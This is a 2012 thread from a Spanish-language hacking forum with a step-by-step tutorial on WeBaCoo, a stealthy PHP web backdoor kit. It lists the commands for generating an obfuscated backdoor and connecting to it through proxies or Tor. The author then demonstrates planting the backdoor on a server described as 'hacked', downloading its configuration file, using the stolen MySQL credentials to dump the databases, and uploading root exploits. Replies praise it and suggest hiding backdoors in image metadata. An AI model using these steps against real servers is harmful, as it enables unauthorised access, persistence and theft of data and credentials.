comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Backdorizando Servidores Web con WeBaCoo

  • 2 Respuestas
  • 2051 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« en: Agosto 30, 2012, 08:53:46 pm »

WeBaCoo (Web Backdoor Cookie)  es un backdoor web script-kit que proporciona una terminal de  conexión a través de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotación para mantener el acceso a un servidor web (hacked).

WeBaCoo fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido. El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.

WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor, usando payloads predefinidos. También ofrece la "terminal" el modo en que el usuario puede establecer una remota  conexión con el servidor y ejecutar comandos con privilegios deseados del servicio web.

En muchos casos, esta herramienta es muy usada cuando un servidor no tiene instalado el Netcat.

INSTALACIÓN:

COMANDOS:

1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:
Código: Text
  1. ./webacoo.pl -g -o backdoor.php
2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":
Código: Text
  1. ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:
Código: Text
  1. ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:
Código: Text
  1. ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:
Código: Text
  1. ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:
Código: Text
  1. ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:
Código: Text
  1. ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

Ahora bien, teniendo la herramienta instalada y conociendo los comandos, procederemos a crear el backdoor para obtener conexión con el servidor web desde la consola.

Para este caso he obtenido un servidor cualquiera (hacked) donde subiré el backdoor que creare con el siguiente comando:
Código: Text
  1. ./webacoo.pl -g -o backdoor.php

El backdoor.php se crea y ubica en la carpeta de los archivos (WeBaCoo), entonces subiremos dicho archivo al servidor (hacked) y procederemos a conectarnos al servidor con el siguiente comando:
Código: Text
  1. ./webacoo.pl -t -u http://www.sitio-web.com/backdoor.php

La conexión hacia el servidor es perfecta, por lo que obtendremos la conexión muy rapida.

Comandos Simples:

En este caso colocaremos "load" para ver los comandos con los que manejaremos todo el servidor, las cuales son los siguientes:

1) MySQL-CLI: MySQL Command Line Module:
Código: Text
  1. mysql-cli <IP(:port)> <user> <pass>      (ex. 'mysql-cli 10.0.1.11 admin pAsS')
2) PSQL-CLI: Postgres Command Line Module:
Código: Text
  1. psql-cli <IP(:port)> <db> <user> <pass>  (ex. 'psql-cli 10.0.1.12 testDB root pAsS')
3) Upload: File Upload Module:
Código: Text
  1. upload <local_file> <remote_dir>         (ex. 'upload exploit.c /tmp/')
4) Download: File Download Module:
Código: Text
  1. download <remote_file>                   (ex. 'download config.php')
5) Stealth: Enhance Stealth Module
Código: Text
  1. stealth <webroot_dir>                 (ex. 'stealth /var/www/html')

Estos comandos son fáciles de usar, haré una breve demostración con el comando MySQL-CLI para obtener y conectarme a la db del servidor.

1) Descargamos el archivo de configuración:
Código: Text
  1. download configuration.php

2) Abrimos el archivo configuration.php copiar el user y password del MySQL, tecleamos el comando:
Código: Text
  1. mysql-cli 127.0.0.1:3306 db_user db_password


3) La tool conectara al MySQL, solo nos queda teclear show databases; para apreciar toda la DB.


De igual forma utilizaremos los demás comandos para subir un local root exploit o descargar cualquier archivo del servidor.

Ahora con esta herramienta ya no es necesario que un servidor web tenga el Netcat o hacer un BackConnection que muchas veces no funciona, para conectarse a un servidor web.

Espero les sirva.

Saludos.
« Última modificación: Agosto 31, 2012, 01:18:02 am por CalebBucker »

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #1 en: Agosto 30, 2012, 09:12:30 pm »
Exelente Aporte! es lo q andaba buscando!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #2 en: Agosto 31, 2012, 10:49:25 am »
yo suelo utilizar weevely que es muy similar a esta tool, incluso se podria inyectar el backdoor en los metadatos de una imagen.

 

¿Te gustó el post? COMPARTILO!



Rootear Servidores Linux By Nort4x

Iniciado por N0rt4x

Respuestas: 9
Vistas: 4262
Último mensaje Septiembre 18, 2012, 05:30:12 pm
por Barym
Recopilando Información de Servidores con DMitry

Iniciado por CalebBucker

Respuestas: 0
Vistas: 1584
Último mensaje Septiembre 08, 2012, 08:29:34 pm
por CalebBucker
Rooteando Servidores Linux By:messerschmitt

Iniciado por RooT_Shell

Respuestas: 2
Vistas: 2228
Último mensaje Junio 25, 2010, 08:22:07 pm
por h4ck3r
HttPrint: Analizar servidores web

Iniciado por Stuxnet

Respuestas: 0
Vistas: 1631
Último mensaje Diciembre 05, 2012, 12:02:18 pm
por Stuxnet
Backdorizando un archivo PHP

Iniciado por Okol

Respuestas: 5
Vistas: 2916
Último mensaje Enero 15, 2013, 12:27:22 am
por Okol